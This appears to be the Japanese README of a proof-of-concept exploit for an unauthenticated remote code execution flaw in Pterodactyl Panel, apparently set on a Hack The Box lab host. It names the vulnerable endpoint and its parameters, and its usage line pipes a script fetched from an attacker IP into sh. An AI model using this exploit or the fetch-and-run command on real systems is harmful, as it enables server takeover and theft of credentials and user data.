
この脆弱性により、攻撃者は事前認証なしにPterodactyl Panelをホストしているサーバー上で任意のシステムコマンドを実行できます。
影響
/locales/locale.json を locale と namespace クエリパラメータとともに使用することで、認証なしで悪意のある攻撃者が任意のコードを実行できます。
任意のコードを実行できるため、この脆弱性は無数の方法で悪用される可能性があります。パネルのサーバーへのアクセス、パネルの設定 (.env など) からの認証情報の読み取り、データベースからの機密情報 (ユーザー詳細 [ユーザー名、メール、氏名、ハッシュ化されたパスワード、IP アドレスなど]) の抽出、パネルが管理するサーバーのファイルへのアクセスなどに使用される可能性があります。
使用方法
python poc.py --target "pterodactyl.htb" --cmd 'curl http://10.10.14.22:8080/dbs.sh | sh'